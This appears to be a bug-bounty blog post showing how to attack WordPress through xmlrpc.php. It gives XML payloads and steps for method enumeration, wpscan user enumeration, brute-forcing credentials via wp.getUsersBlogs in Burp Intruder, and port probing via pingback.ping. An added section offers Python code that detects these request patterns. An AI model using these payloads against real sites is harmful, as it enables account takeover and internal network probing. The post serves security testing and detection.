How to hack WordPress website via xmlrpc.php?

Muhammad Asim Shahzad
Jun 11 · 5 min read

Hello guys,

This is Muhammad Asim Shahzad a.k.a protector47. As I said before on my Facebook fan page, I will now share all my findings and PoCs.

Facebook Page: https://www.facebook.com/protector47.official/

Like and follow my Facebook page to get a notification for each and every post/writeup, because I am also planning to start a bug bounty guide program for those who want to start bug bounty but don't know how.

Do like, share and follow to spread the knowledge. That's all! Now back to the point. Today I will discuss how we can brute-force WordPress credentials and perform a Cross-Site Port attack via the XML remote procedure call interface (xmlrpc.php).

Nothing is secure :)

What is WordPress?

WordPress is the world’s most popular content management system for creating websites. WordPress is capable of creating any style of website, from a simple blog to a full-featured business website. You can even use WordPress to create an online store (using the popular WooCommerce plugin).

XML-RPC on WordPress is actually an API, or "application program interface". It gives developers who make mobile apps, desktop apps, and other services the ability to talk to your WordPress site. The XML-RPC API that WordPress provides gives developers a way to write applications (for you) that can do many of the things you can do when logged into WordPress via the web interface. These include:
1) Publish a post
2) Edit a post
3) Delete a post
4) Upload a new file (e.g. an image for a post)
5) Get a list of comments
6) Edit comments

Some Vulnerabilities in XML-RPC:

There are several vulnerabilities we can test for if xmlrpc.php is enabled on a WordPress website. I will share the proper steps to test xmlrpc.php for them.

ATTACK# 1:

  1. If you are testing a WordPress website, first of all check whether xmlrpc.php is enabled or not by requesting:

NOTE: I can’t share the website because it is a private program on HackerOne.

https://website.com/xmlrpc.php

If that URL responds, XML-RPC is enabled.

2. Intercept the request via Burp Proxy and send it to Repeater.

3. It says "Method Not Allowed" because xmlrpc.php expects the POST method rather than GET, so we have to change the request method.

Change the method by selecting the option "Change request method"; the method is now POST.

4. Now that the method is POST, we send a POST request that lists all the available methods. Why? Because that is how we learn which actions are even possible and can potentially use one of them for an attack.
To list all methods, send a POST request with the following POST data; you will get a response with all the methods available:

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

The response lists every available method.

Search for the following methods; if they are available, we can proceed with some attacks:

  1. wp.getUserBlogs
  2. wp.getCategories
  3. metaWeblog.getUsersBlogs
  4. pingback.ping

5. To perform the brute-force login, send the following in the POST request. If you already know any valid usernames, that is even better.
I would recommend WPScan to find a list of valid usernames; almost all the time, companies never try to prevent username enumeration on WordPress sites.

We can enumerate the usernames of a WordPress website by simply using WPScan, a built-in tool of Kali Linux.

Run this command on terminal:

wpscan --url https://website.com --enumerate u

6. Once usernames are enumerated, we are able to brute-force the password via xmlrpc.php.

7. Send the POST request containing this POST data, in which the value "admin" is the username and the value "pass" is the password:

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

8. You can just load this into Intruder and brute-force away.
Whether you enter the wrong password or the correct one you will get a 200 OK response, so if you are using Intruder you have to decide which is correct and which is wrong on the basis of the response size.

ATTACK# 2:

  1. List all the methods and search for the following:
    pingback.ping

2. If you manage to find the "pingback.ping" string, let's proceed and try to get a pingback on our server. You can use netcat, a Python server, a Node.js server, or even the Apache logs, anything you want. I'll be using the Python server. Start your server, then send the following request as POST data.

Start your Python server.

Check your IP to get a pingback to your python server.

In my case, my IP is 192.168.0.106 (make sure your VM is in bridged mode).

3. Time to craft a request via BURP to get the pingback to our server. We have to craft a request containing this POST data:

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://<YOUR SERVER>:<port></string></value></param>
<param><value><string>http://<SOME VALID BLOG FROM THE SITE></string></value></param>
</params>
</methodCall>

In the POST data above, <YOUR SERVER>:<port> means the Python server that we have already started, and <SOME VALID BLOG FROM THE SITE> means any valid blog post link on the target website.

In the response shown, the <int> tag contains the value zero.

4. If the response contains a faultCode with a value greater than 0 (for example <value><int>17</int></value>), it means the port is open; you can verify this by checking your server logs.
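From the defender's side, both attacks above leave a recognisable shape in the XML-RPC request stream: a system.listMethods probe, a burst of wp.getUsersBlogs calls each carrying a username/password pair, and pingback.ping calls whose sourceURI points at a non-web port or internal address. The following added example (my own code, not from the original post or from WordPress) parses request bodies captured at a reverse proxy or WAF and raises alerts for those patterns; the threshold, the allowed ports and the sample traffic are constructed assumptions.

```python
import ipaddress
import xml.etree.ElementTree as ET
from collections import Counter
from urllib.parse import urlparse

# Assumed tuning for this example, not a WordPress default.
LOGIN_ATTEMPT_THRESHOLD = 5
ALLOWED_PINGBACK_PORTS = {None, 80, 443}

def parse_call(body):
    """Return (methodName, [param strings]) from an XML-RPC <methodCall> body."""
    root = ET.fromstring(body)
    method = (root.findtext("methodName") or "").strip()
    params = ["".join(v.itertext()).strip() for v in root.iter("value")]
    return method, params

def suspicious_pingback(url):
    """True when a pingback sourceURI targets a non-web port or internal address space."""
    parsed = urlparse(url)
    if parsed.port not in ALLOWED_PINGBACK_PORTS:
        return True
    host = parsed.hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host == "localhost"
    return ip.is_private or ip.is_loopback or ip.is_link_local

def analyse(requests):
    """requests: iterable of (client_ip, xml_body). Returns a list of alert strings."""
    alerts, attempts = [], Counter()
    for ip, body in requests:
        try:
            method, params = parse_call(body)
        except ET.ParseError:
            alerts.append(f"{ip}: malformed XML-RPC body")
            continue
        if method == "system.listMethods":
            alerts.append(f"{ip}: method enumeration via system.listMethods")
        elif method == "wp.getUsersBlogs":
            attempts[ip] += 1  # every call is one credential guess
            if attempts[ip] == LOGIN_ATTEMPT_THRESHOLD:
                alerts.append(f"{ip}: {attempts[ip]} wp.getUsersBlogs auth attempts, likely brute force")
        elif method == "pingback.ping" and params and suspicious_pingback(params[0]):
            alerts.append(f"{ip}: pingback.ping sourceURI {params[0]} targets internal host/port")
    return alerts

# Constructed sample traffic from one client (not captured from a real site).
LOGIN = ("<methodCall><methodName>wp.getUsersBlogs</methodName><params>"
         "<param><value>admin</value></param><param><value>{}</value></param></params></methodCall>")
SAMPLE = [("203.0.113.5", "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>")]
SAMPLE += [("203.0.113.5", LOGIN.format(f"guess{i}")) for i in range(6)]
SAMPLE.append(("203.0.113.5", "<methodCall><methodName>pingback.ping</methodName><params>"
               "<param><value><string>http://192.168.0.106:8000</string></value></param>"
               "<param><value><string>https://website.com/?p=1</string></value></param></params></methodCall>"))
```

Running analyse(SAMPLE) yields three alerts, one per pattern; in production the counter would be keyed by client and time window rather than kept for the whole capture.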

I have reported this vulnerability to a HackerOne private program and my report got triaged.

Thanks for reading my blog!

NOTE: Share this blog as much as you can to spread the knowledge, and follow my Facebook fan page to get updates.

Happy Hacking :)

Muhammad Asim Shahzad

Written by

Synack Red Team Member | Bug Bounty Hunter at HackerOne | Pentest Engineer at Trillium Information Security Systems.